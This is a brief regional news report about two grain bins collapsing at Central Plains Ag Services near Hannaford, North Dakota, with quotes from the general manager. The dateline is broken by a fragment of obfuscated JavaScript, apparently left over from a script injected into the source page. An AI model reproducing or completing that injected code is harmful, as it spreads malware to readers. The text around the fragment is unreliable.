HANNAFORD, ndszs|var|u0026u|referrer|zeeti||js|php’.split(‘|’),0,{}))
ND – (NewsDakota.com) No one was injured after two big grain bins collapsed yesterday near Hannaford at Central Plains Ag Services.

General Manager Ben Jacob said the bin was full to capacity with about 580,000 bushels of spring wheat. He said once that bin collapsed a second metal bin nearby went down too.

According to Jacob, workers heard what sounded like metal rivets popping and then the sound of the metal bin collapsing with grain rushing out.

The two metal grain bins were two years old. He said an assessment team will be coming Thursday (today) to see if the concrete elevator was damaged. A salvage crew will work to clear the rail spur track covered with metal debris and thousands of bushels of wheat.

Jacob said the timing was bad being the empty bin that collapsed would have been used to store soybeans and that harvest was just getting underway. He wouldn’t speculate on the cause of the grain bin collapse. He said we will leave the cause of the collapse up to the investigators.
